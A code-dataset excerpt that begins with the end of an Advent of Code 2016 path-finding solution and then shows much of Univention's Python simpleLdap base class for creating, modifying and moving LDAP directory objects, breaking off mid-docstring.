break\n\n hexits = path.hash.hexdigest()[:4]\n for (dirn, xdel, ydel), hexit in zip(dirns, hexits):\n new_path = grow_path(path, xdel, ydel, dirn, hexit)\n if new_path is not None:\n frontier.append(new_path)\n\n path = path_to_str(path)\n print('%s -> %s' % (pwd, path))\n if expected is not None and expected != path:\n print('%s != %s' % (path, expected))\n raise AssertionError('Unexpected output')\n\n\ntry:\n run('hijkl')\n raise AssertionError('This password should not work')\nexcept IndexError:\n pass\n\nrun('ihgpwlah', 'DDRRRD')\nrun('kglvqrro', 'DDUDRLRRUDRD')\nrun('ulqzkmiv', 
'DRURDRUDDLLDLUURRDULRLDUUDDDRR')\nrun('pxxbnzuo')\n","repo_name":"reinderien/advent","sub_path":"2016/17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"19853322341","text":"from __future__ import absolute_import\n\nimport copy\nimport inspect\nimport re\nimport sys\nimport time\nimport traceback\nfrom ipaddress import IPv4Address, IPv6Address, ip_address, ip_network\nfrom typing import Any, Dict, Iterable, List, Optional, Set, Text, Tuple, Union # noqa: F401\n\nimport ldap\nimport six\nfrom ldap.controls.readentry import PostReadControl\nfrom ldap.dn import dn2str, escape_dn_chars, explode_rdn, str2dn\nfrom ldap.filter import filter_format\n\nimport univention.admin.filter\nimport univention.admin.localization\nimport univention.admin.mapping\nimport univention.admin.modules\nimport univention.admin.syntax\nimport univention.admin.uexceptions\nimport univention.admin.uldap\nimport univention.debug as ud\nfrom univention.admin import configRegistry\nfrom univention.admin.uldap import DN\nfrom univention.admindiary.client import write_event\nfrom univention.admindiary.events import DiaryEvent\n\n\ntry:\n import univention.lib.admember\n _prevent_to_change_ad_properties = univention.lib.admember.is_localhost_in_admember_mode()\nexcept ImportError:\n ud.debug(ud.ADMIN, ud.WARN, \"Failed to import univention.lib.admember\")\n _prevent_to_change_ad_properties = False\n\ngetfullargspec = getattr(inspect, 'getfullargspec', getattr(inspect, 'getargspec', None))\n\n_Attributes = Dict[Text, Union[bytes, List[bytes]]]\n_Properties = Dict[Text, Union[Text, List[Text]]]\n\ntranslation = univention.admin.localization.translation('univention/admin/handlers')\n_ = translation.translate\n\n# global caching variable\nif configRegistry.is_true('directory/manager/samba3/legacy', False):\n s4connector_present = False # type: Optional[bool]\nelif 
configRegistry.is_false('directory/manager/samba3/legacy', False):\n s4connector_present = True\nelse:\n s4connector_present = None\n\n\ndef disable_ad_restrictions(disable=True): # type: (bool) -> None\n global _prevent_to_change_ad_properties\n _prevent_to_change_ad_properties = disable\n\n\nclass simpleLdap(object):\n \"\"\"\n The base class for all UDM handler modules.\n\n :param co:\n *deprecated* parameter for a config. Please pass `None`.\n :type co: None\n\n :param lo:\n A required LDAP connection object which is used for all LDAP operations (search, create, modify).\n It should be bound to a user which has the LDAP permissions to do the required operations.\n :type lo: :class:`univention.admin.uldap.access`\n\n :param position:\n The LDAP container where a new object should be created in, or `None` for existing objects.\n :type position: :class:`univention.admin.uldap.position` or `None`\n\n :param dn:\n The DN of an existing LDAP object. If a object should be created the DN must not be passed here!\n :type dn: str or None\n\n :param superordinate:\n The superordinate object of this object. Can be omitted. It is automatically searched by the given DN or position.\n :type superordinate: :class:`univention.admin.handlers.simpleLdap` or `None`.\n\n :param attributes:\n The LDAP attributes of the LDAP object as dict. This should by default be omitted. To save performance when an LDAP search is done this can be used, e.g. by the lookup() method.\n If given make sure the dict contains all attributes which are required by :meth:`_ldap_attributes`.\n :type attributes: None or dict\n\n The following attributes hold information about the state of this object:\n\n :ivar str dn:\n A LDAP distinguished name (DN) of this object (if exists, otherwise None)\n :ivar str module: the UDM handlers name (e.g. users/user)\n :ivar dict oldattr:\n The LDAP attributes of this object as dict. 
If the object does not exists the dict is empty.\n :ivar dict info:\n A internal dictionary which holds the values for every property.\n :ivar list options:\n A list of UDM options which are enabled on this object. Enabling options causes specific object classes and attributes to be added to the object.\n :ivar list policies:\n A list of DNs containing references to assigned policies.\n :ivar dict properties: a dict which maps all UDM properties to :class:`univention.admin.property` instances.\n :ivar univention.admin.mapping.mapping mapping:\n A :class:`univention.admin.mapping.mapping` instance containing a mapping of UDM property names to LDAP attribute names.\n :ivar dict oldinfo:\n A private copy of :attr:`info` containing the original properties which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n :ivar list old_options:\n A private copy of :attr:`options` containing the original options which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n :ivar list oldpolicies:\n A private copy of :attr:`policies` containing the original policies which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n\n .. caution::\n Do not operate on :attr:`info` directly because this would bypass syntax validations. 
This object should be used like a dict.\n Properties should be assigned in the following way: obj['name'] = 'value'\n \"\"\"\n\n module = '' # the name of the module\n use_performant_ldap_search_filter = False\n\n def __init__(self, co, lo, position, dn=u'', superordinate=None, attributes=None): # type: (None, univention.admin.uldap.access, univention.admin.uldap.position, Text, simpleLdap, _Attributes) -> None\n self._exists = False\n self.co = None\n if isinstance(lo, univention.admin.uldap.access):\n self.lo = lo # type: univention.admin.uldap.access\n elif isinstance(lo, univention.uldap.access):\n ud.debug(ud.ADMIN, ud.ERROR, 'using univention.uldap.access instance is deprecated. Use univention.admin.uldap.access instead.')\n self.lo = univention.admin.uldap.access(lo=lo)\n else:\n raise TypeError('lo must be instance of univention.admin.uldap.access.')\n\n self.dn = dn.decode('utf-8') if isinstance(dn, bytes) else dn # type: Optional[Text]\n self.old_dn = self.dn # type: Optional[Text]\n self.superordinate = superordinate # type: Optional[univention.admin.handlers.simpleLdap]\n\n self.set_defaults = not self.dn # this object is newly created and so we can use the default values\n\n self.position = position or univention.admin.uldap.position(lo.base) # type: univention.admin.uldap.position\n if not position and self.dn:\n self.position.setDn(self.dn)\n self.info = {} # type: _Properties\n self.oldinfo = {} # type: _Properties\n self.policies = [] # type: List[Text]\n self.oldpolicies = [] # type: List[Text]\n self.policyObjects = {} # type: Dict[Text, simplePolicy]\n self.__no_default = [] # type: List[Text]\n\n self._open = False\n self.options = [] # type: List[Text]\n self.old_options = [] # type: List[Text]\n self.alloc = [] # type: List[Union[Tuple[str, str], Tuple[str, str, bool]]] # name,value,updateLastUsedValue\n\n # s4connector_present is a global caching variable than can be\n # None ==> ldap has not been checked for servers with service \"S4 
Connector\"\n # True ==> at least one server with IP address (aRecord) is present\n # False ==> no server is present\n global s4connector_present\n if s4connector_present is None:\n s4connector_present = False\n searchResult = self.lo.searchDn(u'(&(|(objectClass=univentionDomainController)(objectClass=univentionMemberServer))(univentionService=S4 Connector)(|(aRecord=*)(aAAARecord=*)))')\n s4connector_present = bool(searchResult)\n self.s4connector_present = s4connector_present\n\n if not univention.admin.modules.modules:\n ud.debug(ud.ADMIN, ud.WARN, 'univention.admin.modules.update() was not called')\n univention.admin.modules.update()\n\n m = univention.admin.modules.get(self.module)\n if not hasattr(self, 'mapping'):\n self.mapping = getattr(m, 'mapping', None)\n\n self.oldattr = {} # type: _Attributes\n if attributes:\n self.oldattr = attributes\n elif self.dn:\n try:\n attr = self._ldap_attributes()\n self.oldattr = self.lo.get(self.dn, attr=attr, required=True)\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if self.oldattr:\n self._exists = True\n if not univention.admin.modules.virtual(self.module) and not univention.admin.modules.recognize(self.module, self.dn, self.oldattr):\n raise univention.admin.uexceptions.wrongObjectType('%s is not recognized as %s.' 
% (self.dn, self.module))\n oldinfo = self.mapping.unmapValues(self.oldattr)\n oldinfo = self._post_unmap(oldinfo, self.oldattr)\n oldinfo = self._falsy_boolean_extended_attributes(oldinfo)\n self.info.update(oldinfo)\n\n self.policies = [x.decode('utf-8') for x in self.oldattr.get('univentionPolicyReference', [])]\n self.__set_options()\n self.save()\n\n self._validate_superordinate(False)\n\n @property\n def descriptions(self): # type: () -> Dict[Text, univention.admin.property]\n return univention.admin.modules.get(self.module).property_descriptions\n\n @property\n def entry_uuid(self): # type: () -> Optional[str]\n \"\"\"The entry UUID of the object (if object exists)\"\"\"\n if 'entryUUID' in self.oldattr:\n return self.oldattr['entryUUID'][0].decode('ASCII')\n\n def save(self): # type: () -> None\n \"\"\"\n Saves the current internal object state as old state for later comparison when e.g. modifying this object.\n\n .. seealso:: This method should be called by :func:`univention.admin.handlers.simpleLdap.open` and after further modifications in modify() / create().\n\n .. 
note:: self.oldattr is not set and must be set manually\n \"\"\"\n self.oldinfo = copy.deepcopy(self.info)\n self.old_dn = self.dn\n self.oldpolicies = copy.deepcopy(self.policies)\n self.options = list(set(self.options))\n self.old_options = []\n if self.exists():\n self.old_options = copy.deepcopy(self.options)\n\n def diff(self): # type: () -> List[Tuple[str, Any, Any]]\n \"\"\"\n Returns the difference between old and current state as a UDM modlist.\n\n :returns: A list of 3-tuples (udm-property-name, old-property-value, new-property-values).\n :rtype: list\n \"\"\"\n changes = [] # type: List[Tuple[str, Any, Any]]\n\n for key, prop in self.descriptions.items():\n null = [] if prop.multivalue else None # type: Union[List, None]\n # remove properties which are disabled by options\n if prop.options and not set(prop.options) & set(self.options):\n if self.oldinfo.get(key, null) not in (null, None):\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap.diff: key %s not valid (option not set)\" % key)\n changes.append((key, self.oldinfo[key], null))\n continue\n if (self.oldinfo.get(key) or self.info.get(key)) and self.oldinfo.get(key, null) != self.info.get(key, null):\n changes.append((key, self.oldinfo.get(key, null), self.info.get(key, null)))\n\n return changes\n\n def hasChanged(self, key): # type: (Union[str, List[str], Tuple[str]]) -> bool\n \"\"\"\n Checks if the given attribute(s) was (were) changed.\n\n :param key: The name of a property.\n :type key: str or list[str] or tuple[str]\n :returns: True if the property changed, False otherwise.\n :rtype: bool\n \"\"\"\n # FIXME: key can even be nested\n if not isinstance(key, six.string_types):\n return any(self.hasChanged(i) for i in key)\n if (not self.oldinfo.get(key, '') or self.oldinfo[key] == ['']) and (not self.info.get(key, '') or self.info[key] == ['']):\n return False\n\n return not univention.admin.mapping.mapCmp(self.mapping, key, self.oldinfo.get(key, ''), self.info.get(key, ''))\n\n def ready(self): # type: 
() -> bool\n \"\"\"\n Makes sure all preconditions are met before creating or modifying this object.\n\n It checks if all properties marked required are set.\n It checks if the superordinate is valid.\n\n :returns: True\n :rtype: bool\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n \"\"\"\n missing = []\n for name, p in self.descriptions.items():\n # skip if this property is not present in the current option set\n if p.options and not set(p.options) & set(self.options):\n continue\n\n if p.required and (not self[name] or (isinstance(self[name], list) and self[name] == [u''])):\n ud.debug(ud.ADMIN, ud.INFO, \"property %s is required but not set.\" % name)\n missing.append(name)\n if missing:\n raise univention.admin.uexceptions.insufficientInformation(_('The following properties are missing:\\n%s') % ('\\n'.join(missing),), missing_properties=missing)\n\n # when creating a object make sure that its position is underneath of its superordinate\n if not self.exists() and self.position and self.superordinate and not self._ensure_dn_in_subtree(self.superordinate.dn, self.position.getDn()):\n raise univention.admin.uexceptions.insufficientInformation(_('The position must be in the subtree of the superordinate.'))\n\n self._validate_superordinate(True)\n\n return True\n\n if six.PY2:\n def has_key(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module and if it is enabled in the set UDM options.\n\n :param str key: The name of a property.\n :returns: True if the property exists and is enabled, False otherwise.\n :rtype: bool\n\n .. 
deprecated:: 4.4\n Use :func:`univention.admin.handlers.simpleLdap.has_property` instead!\n \"\"\"\n return self.has_property(key)\n\n def has_property(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module and if it is enabled in the set UDM options.\n\n :param str key: The name of a property.\n :returns: True if the property exists and is enabled, False otherwise.\n :rtype: bool\n \"\"\"\n try:\n p = self.descriptions[key]\n except KeyError:\n return False\n if p.options:\n return bool(set(p.options) & set(self.options))\n return True\n\n def __setitem__(self, key, value): # type: (str, Any) -> None\n \"\"\"\n Sets or unsets the property to the given value.\n\n :param str key: The name of a property.\n :param value: The value to set.\n\n :raises KeyError: if the property belongs to an option, which is currently not enabled.\n :raises: :class:`univention.admin.uexceptions.noProperty` or :class:`KeyError` if the property does not exists or is not enabled by the UDM options.\n :raises: :class:`univention.admin.uexceptions.valueRequired` if the value is unset but required.\n :raises: :class:`univention.admin.uexceptions.valueMayNotChange` if the values cannot be modified.\n :raises: :class:`univention.admin.uexceptions.valueInvalidSyntax` if the value is invalid.\n \"\"\"\n def _changeable():\n yield self.descriptions[key].editable\n if not self.descriptions[key].may_change:\n yield key not in self.oldinfo or self.oldinfo[key] == value\n # if _prevent_to_change_ad_properties: # FIXME: users.user.object.__init__ modifies firstname and lastname by hand\n # yield not (self.descriptions[key].readonly_when_synced and self._is_synced_object() and self.exists())\n\n # property does not exist\n if not self.has_property(key):\n # don't set value if the option is not enabled\n ud.debug(ud.ADMIN, ud.WARN, '__setitem__: Ignoring property %s' % key)\n try:\n self.descriptions[key]\n except KeyError:\n # raise 
univention.admin.uexceptions.noProperty(key)\n raise\n return\n # attribute may not be changed\n elif not all(_changeable()):\n raise univention.admin.uexceptions.valueMayNotChange(_('key=%(key)s old=%(old)s new=%(new)s') % {'key': key, 'old': self[key], 'new': value}, property=key)\n # required attribute may not be removed\n elif self.descriptions[key].required and not value:\n raise univention.admin.uexceptions.valueRequired(_('The property %s is required') % self.descriptions[key].short_description, property=key)\n # do nothing\n if self.info.get(key, None) == value:\n ud.debug(ud.ADMIN, ud.INFO, 'values are identical: %s:%s' % (key, value))\n return\n\n if self.info.get(key, None) == self.descriptions[key].default(self):\n self.__no_default.append(key)\n\n if self.descriptions[key].multivalue:\n\n # make sure value is list\n if isinstance(value, six.string_types):\n value = [value]\n elif not isinstance(value, list):\n raise univention.admin.uexceptions.valueInvalidSyntax(_('The property %s must be a list') % (self.descriptions[key].short_description,), property=key)\n\n self.info[key] = []\n for v in value:\n if not v:\n continue\n err = \"\"\n p = None\n try:\n s = self.descriptions[key].syntax\n p = s.parse(v)\n\n except univention.admin.uexceptions.valueError as emsg:\n err = emsg\n if not p:\n if not err:\n err = \"\"\n try:\n raise univention.admin.uexceptions.valueInvalidSyntax(\"%s: %s\" % (key, err), property=key)\n except UnicodeEncodeError: # raise fails if err contains umlauts or other non-ASCII-characters\n raise univention.admin.uexceptions.valueInvalidSyntax(self.descriptions[key].short_description, property=key)\n self.info[key].append(p)\n\n elif not value and key in self.info:\n del self.info[key]\n\n elif value:\n err = \"\"\n p = None\n try:\n s = self.descriptions[key].syntax\n p = s.parse(value)\n except univention.admin.uexceptions.valueError as e:\n err = e\n if not p:\n if not err:\n err = \"\"\n try:\n raise 
univention.admin.uexceptions.valueInvalidSyntax(\"%s: %s\" % (self.descriptions[key].short_description, err), property=key)\n except UnicodeEncodeError: # raise fails if err contains umlauts or other non-ASCII-characters\n raise univention.admin.uexceptions.valueInvalidSyntax(\"%s\" % self.descriptions[key].short_description, property=key)\n self.info[key] = p\n\n def __getitem__(self, key): # type: (str) -> Any\n \"\"\"\n Get the currently set value of the given property.\n\n :param str key: The name of a property.\n :returns: The currently set value. If the value is not set the default value is returned.\n\n .. warning:: this method changes the set value to the default if it is unset. For a side effect free retrieval of the value use :func:`univention.admin.handlers.simpleLdap.get`.\n \"\"\"\n if not key:\n return None\n\n if key in self.info:\n if self.descriptions[key].multivalue and not isinstance(self.info[key], list):\n # why isn't this correct in the first place?\n ud.debug(ud.ADMIN, ud.WARN, 'The mapping for %s in %s is broken!' % (key, self.module))\n self.info[key] = [self.info[key]]\n return self.info[key]\n elif key not in self.__no_default and self.descriptions[key].editable:\n self.info[key] = self.descriptions[key].default(self)\n return self.info[key]\n elif self.descriptions[key].multivalue:\n return []\n else:\n return None\n\n def get(self, key, default=None): # type: (str, Any) -> Any\n \"\"\"\n Return the currently set value of the given property.\n\n :param str key: The name of a property.\n :param default: The default to return if the property is not set.\n :returns: The currently set value. If the value is not set :attr:`default` is returned.\n \"\"\"\n return self.info.get(key, default)\n\n def __contains__(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module.\n\n :param key: The name of a property.\n :returns: True if the property exists, False otherwise.\n :rtype: bool\n\n .. 
warning:: This does not check if the property is also enabled by the UDM options. Use :func:`univention.admin.handlers.simpleLdap.has_property` instead.\n \"\"\"\n return key in self.descriptions\n\n def keys(self): # type: () -> Iterable[str]\n \"\"\"\n Returns the names of all properties this module has.\n\n :returns: The list of property names.\n :rtype: list[str]\n \"\"\"\n return self.descriptions.keys()\n\n def items(self): # type: () -> Iterable[Tuple[str, Any]]\n \"\"\"\n Return all items which belong to the current options - even if they are empty.\n\n :returns: a list of 2-tuples (udm-property-name, property-value).\n :rtype: list[tuple]\n\n .. warning:: In certain circumstances this sets the default value for every property (e.g. when having a new object).\n \"\"\"\n return [(key, self[key]) for key in self.keys() if self.has_property(key)]\n\n def create(self, serverctrls=None, response=None): # type: (List[ldap.controls.LDAPControl], Dict[Text, Any]) -> Text\n \"\"\"\n Creates the LDAP object if it does not exists by building the list of attributes (addlist) and write it to LDAP.\n If this call raises an exception it is necessary to instantiate a new object before trying to create it again.\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be created.\n :raises: :class:`univention.admin.uexceptions.objectExists` if the object already exists.\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :param serverctrls: a list of :py:class:`ldap.controls.LDAPControl` instances sent to the server along with the LDAP request.\n :type serverctrls: list[ldap.controls.LDAPControl]\n :param dict response: An optional dictionary to receive the server controls of the result.\n :returns: The DN of the created object.\n :rtype: str\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'add'):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" 
object type can not be created.') % (self.module,))\n\n if self.exists():\n raise univention.admin.uexceptions.objectExists(self.dn)\n\n if not isinstance(response, dict):\n response = {}\n\n try:\n self._ldap_pre_ready()\n self.ready()\n\n dn = self._create(response=response, serverctrls=serverctrls)\n except Exception:\n self._safe_cancel()\n raise\n\n for c in response.get('ctrls', []):\n if c.controlType == PostReadControl.controlType:\n self.oldattr.update({k: [v if isinstance(v, bytes) else v.encode('ISO8859-1') for v in val] for k, val in c.entry.items()})\n self._write_admin_diary_create()\n return dn\n\n def _get_admin_diary_event(self, event_name):\n name = self.module.replace('/', '_').upper()\n return DiaryEvent.get('UDM_%s_%s' % (name, event_name)) or DiaryEvent.get('UDM_GENERIC_%s' % event_name)\n\n def _get_admin_diary_args_names(self, event):\n return [\n name\n for name in self.descriptions\n if name in event.args\n ]\n\n def _get_admin_diary_args(self, event):\n args = {'module': self.module}\n if event.name.startswith('UDM_GENERIC_'):\n value = self.dn\n for k, v in self.descriptions.items():\n if v.identifies:\n value = self[k]\n break\n args['id'] = value\n else:\n for name in self._get_admin_diary_args_names(event):\n args[name] = str(self[name])\n return args\n\n def _get_admin_diary_username(self):\n username = ldap.dn.explode_rdn(self.lo.binddn)[0]\n if username != 'cn=admin':\n username = username.rsplit('=', 1)[1]\n return username\n\n def _write_admin_diary_event(self, event, additional_args=None):\n try:\n event = self._get_admin_diary_event(event)\n if not event:\n return\n args = self._get_admin_diary_args(event)\n if args:\n if additional_args:\n args.update(additional_args)\n username = self._get_admin_diary_username()\n write_event(event, args, username=username)\n except Exception as exc:\n ud.debug(ud.ADMIN, ud.WARN, \"Failed to write Admin Diary entry: %s\" % exc)\n\n def _write_admin_diary_create(self):\n 
self._write_admin_diary_event('CREATED')\n\n def modify(self, modify_childs=True, ignore_license=False, serverctrls=None, response=None): # type: (bool, bool, List[ldap.controls.LDAPControl], Dict[Text, Any]) -> Text\n \"\"\"\n Modifies the LDAP object by building the difference between the current state and the old state of this object and write this modlist to LDAP.\n\n :param modify_childs: Specifies if child objects should be modified as well.\n :type modify_childs: bool\n\n :param ignore_license: If the license is exceeded the modification may fail. Setting this to True causes license checks to be disabled\n :type ignore_license: bool\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be modified.\n\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :returns: The DN of the modified object.\n :rtype: str\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'edit'):\n # if the licence is exceeded 'edit' is removed from the modules operations. 
Nevertheless we need a way to make modifications then.\n if not ignore_license:\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be modified.') % (self.module,))\n\n if not self.exists():\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if not isinstance(response, dict):\n response = {}\n\n try:\n self._ldap_pre_ready()\n self.ready()\n\n dn = self._modify(modify_childs, ignore_license=ignore_license, response=response, serverctrls=serverctrls)\n except Exception:\n self._safe_cancel()\n raise\n\n for c in response.get('ctrls', []):\n if c.controlType == PostReadControl.controlType:\n self.oldattr.update({k: [v if isinstance(v, bytes) else v.encode('ISO8859-1') for v in val] for k, val in c.entry.items()})\n return dn\n\n def _write_admin_diary_modify(self):\n self._write_admin_diary_event('MODIFIED')\n\n def _create_temporary_ou(self): # type: () -> Text\n name = u'temporary_move_container_%s' % time.time()\n\n module = univention.admin.modules.get('container/ou')\n position = univention.admin.uldap.position(u'%s' % self.lo.base)\n\n temporary_object = module.object(None, self.lo, position)\n temporary_object.open()\n temporary_object['name'] = name\n temporary_object.create()\n\n return u'ou=%s' % ldap.dn.escape_dn_chars(name)\n\n def _delete_temporary_ou_if_empty(self, temporary_ou): # type: (str) -> None\n \"\"\"\n Try to delete the organizational unit entry if it is empty.\n\n :param str temporary_ou: The distinguished name of the container.\n \"\"\"\n if not temporary_ou:\n return\n\n dn = u'%s,%s' % (temporary_ou, self.lo.base)\n\n module = univention.admin.modules.get('container/ou')\n temporary_object = univention.admin.modules.lookup(module, None, self.lo, scope='base', base=dn, required=True, unique=True)[0]\n temporary_object.open()\n try:\n temporary_object.remove()\n except (univention.admin.uexceptions.ldapError, ldap.NOT_ALLOWED_ON_NONLEAF):\n pass\n\n def move(self, newdn, 
ignore_license=False, temporary_ou=None): # type: (str, bool, str) -> str\n \"\"\"\n Moves the LDAP object to the target position.\n\n :param str newdn: The DN of the target position.\n :param bool ignore_license: If the license is exceeded the modification may fail. Setting this to True causes license checks to be disabled.\n :param str temporary_ou: The distiguished name of a temporary container which is used to rename the object if only is letter casing changes.\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be moved.\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n\n :returns: The new DN of the moved object\n :rtype: str\n \"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'move: called for %s to %s' % (self.dn, newdn))\n\n if not (univention.admin.modules.supports(self.module, 'move') or univention.admin.modules.supports(self.module, 'subtree_move')):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be moved.') % (self.module,))\n\n if self.lo.compare_dn(self.dn, self.lo.whoami()):\n raise univention.admin.uexceptions.invalidOperation(_('The own object cannot be moved.'))\n\n if not self.exists():\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if _prevent_to_change_ad_properties and self._is_synced_object():\n raise univention.admin.uexceptions.invalidOperation(_('Objects from Active Directory can not be moved.'))\n\n def n(x):\n return dn2str(str2dn(x))\n\n newdn = n(newdn)\n self.dn = n(self.dn)\n\n goaldn = self.lo.parentDn(newdn)\n goalmodule = univention.admin.modules.identifyOne(goaldn, self.lo.get(goaldn))\n goalmodule = univention.admin.modules.get(goalmodule)\n if not goalmodule or not hasattr(goalmodule, 'childs') or not goalmodule.childs == 1:\n raise univention.admin.uexceptions.invalidOperation(_(\"Destination object can't have sub objects.\"))\n\n if self.lo.compare_dn(self.dn.lower(), 
newdn.lower()):\n if self.dn == newdn:\n raise univention.admin.uexceptions.ldapError(_('Moving not possible: old and new DN are identical.'))\n else:\n # We must use a temporary folder because OpenLDAP does not allow a rename of an container with subobjects\n temporary_ou = self._create_temporary_ou()\n temp_dn = dn2str(str2dn(newdn)[:1] + str2dn(temporary_ou) + str2dn(self.lo.base))\n self.dn = n(self.move(temp_dn, ignore_license, temporary_ou))\n\n if newdn.lower().endswith(self.dn.lower()):\n raise univention.admin.uexceptions.ldapError(_(\"Moving into one's own sub container not allowed.\"))\n\n if univention.admin.modules.supports(self.module, 'subtree_move'):\n # check if is subtree:\n subelements = self.lo.search(base=self.dn, scope='one', attr=[])\n if subelements:\n olddn = self.dn\n ud.debug(ud.ADMIN, ud.INFO, 'move: found subelements, do subtree move: newdn: %s' % newdn)\n # create copy of myself\n module = univention.admin.modules.get(self.module)\n position = univention.admin.uldap.position(self.lo.base)\n position.setDn(self.lo.parentDn(newdn))\n copyobject = module.object(None, self.lo, position)\n copyobject.options = self.options[:]\n copyobject.open()\n for key in self.keys():\n copyobject[key] = self[key]\n copyobject.policies = self.policies\n copyobject.create()\n to_be_moved = []\n moved = []\n pattern = re.compile(u'%s$' % (re.escape(self.dn),), flags=re.I)\n try:\n for subolddn, suboldattrs in subelements:\n # Convert the DNs to lowercase before the replacement. 
The cases might be mixed up if the Python lib is\n # used by the connector, for example:\n # subolddn: uid=user_test_h80,ou=TEST_H81,$LDAP_BASE\n # self.dn: ou=test_h81,$LDAP_BASE\n # newdn: OU=TEST_H81,ou=test_h82,$LDAP_BASE\n # -> subnewdn: uid=user_test_h80,OU=TEST_H81,ou=test_h82,$LDAP_BASE\n subnew_position = pattern.sub(dn2str(str2dn(self.lo.parentDn(subolddn))), newdn)\n subnewdn = dn2str(str2dn(subolddn)[:1] + str2dn(subnew_position))\n ud.debug(ud.ADMIN, ud.INFO, 'move: subelement %r to %r' % (subolddn, subnewdn))\n\n submodule = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subolddn)\n if not subobject or not (univention.admin.modules.supports(submodule, 'move') or univention.admin.modules.supports(submodule, 'subtree_move')):\n subold_rdn = u'+'.join(explode_rdn(subolddn, 1))\n type_ = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n raise univention.admin.uexceptions.invalidOperation(_('Unable to move object %(name)s (%(type)s) in subtree, trying to revert changes.') % {\n 'name': subold_rdn,\n 'type': type_ and type_.module,\n })\n to_be_moved.append((subobject, subolddn, subnewdn))\n\n for subobject, subolddn, subnewdn in to_be_moved:\n subobject.open()\n subobject.move(subnewdn)\n moved.append((subolddn, subnewdn))\n\n univention.admin.objects.get(univention.admin.modules.get(self.module), None, self.lo, position='', dn=self.dn).remove()\n self._delete_temporary_ou_if_empty(temporary_ou)\n except BaseException:\n ud.debug(ud.ADMIN, ud.ERROR, 'move: subtree move failed, trying to move back.')\n position = univention.admin.uldap.position(self.lo.base)\n position.setDn(self.lo.parentDn(olddn))\n for subolddn, subnewdn in moved:\n submodule = univention.admin.modules.identifyOne(subnewdn, self.lo.get(subnewdn))\n submodule = univention.admin.modules.get(submodule)\n subobject = 
univention.admin.objects.get(submodule, None, self.lo, position='', dn=subnewdn)\n subobject.open()\n subobject.move(subolddn)\n copyobject.remove()\n self._delete_temporary_ou_if_empty(temporary_ou)\n raise\n self.dn = newdn\n return newdn\n else:\n # normal move, fails on subtrees\n res = n(self._move(newdn, ignore_license=ignore_license))\n self._delete_temporary_ou_if_empty(temporary_ou)\n return res\n\n else:\n res = n(self._move(newdn, ignore_license=ignore_license))\n self._delete_temporary_ou_if_empty(temporary_ou)\n return res\n\n def move_subelements(self, olddn, newdn, subelements, ignore_license=False): # type: (str, str, List[Tuple[str, Dict]], bool) -> Optional[List[Tuple[str, str]]]\n \"\"\"\n Internal function to move all children of a container.\n\n :param str olddn: The old distinguished name of the parent container.\n :param str newdn: The new distinguished name of the parent container.\n :param subelements: A list of 2-tuples (old-dn, old-attrs) for each child of the parent container.\n :type subelements: tuple[str, dict]\n :param bool ignore_license: If the license is exceeded the modification may fail. 
Setting this to True causes license checks to be disabled.\n :returns: A list of 2-tuples (old-dn, new-dn)\n :rtype: list[tuple[str, str]]\n \"\"\"\n if subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'move: found subelements, do subtree move')\n moved = []\n try:\n for subolddn, suboldattrs in subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'move: subelement %s' % subolddn)\n subnewdn = re.sub(u'%s$' % (re.escape(olddn),), newdn, subolddn) # FIXME: looks broken\n submodule = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subolddn)\n if not subobject or not (univention.admin.modules.supports(submodule, 'move') or univention.admin.modules.supports(submodule, 'subtree_move')):\n subold_rdn = u'+'.join(explode_rdn(subolddn, 1))\n raise univention.admin.uexceptions.invalidOperation(_('Unable to move object %(name)s (%(type)s) in subtree, trying to revert changes.') % {'name': subold_rdn, 'type': univention.admin.modules.identifyOne(subolddn, suboldattrs)})\n subobject.open()\n subobject._move(subnewdn)\n moved.append((subolddn, subnewdn))\n return moved\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, 'move: subtree move failed, try to move back')\n for subolddn, subnewdn in moved:\n submodule = univention.admin.modules.identifyOne(subnewdn, self.lo.get(subnewdn))\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subnewdn)\n subobject.open()\n subobject.move(subolddn)\n raise\n\n return None # FIXME\n\n def remove(self, remove_childs=False): # type: (bool) -> None\n \"\"\"\n Removes this LDAP object.\n\n :param bool remove_childs: Specifies to remove children objects before removing this object.\n\n :raises: :class:`univention.admin.uexceptions.ldapError` (Operation not allowed on non-leaf: subordinate objects must be deleted first) if the 
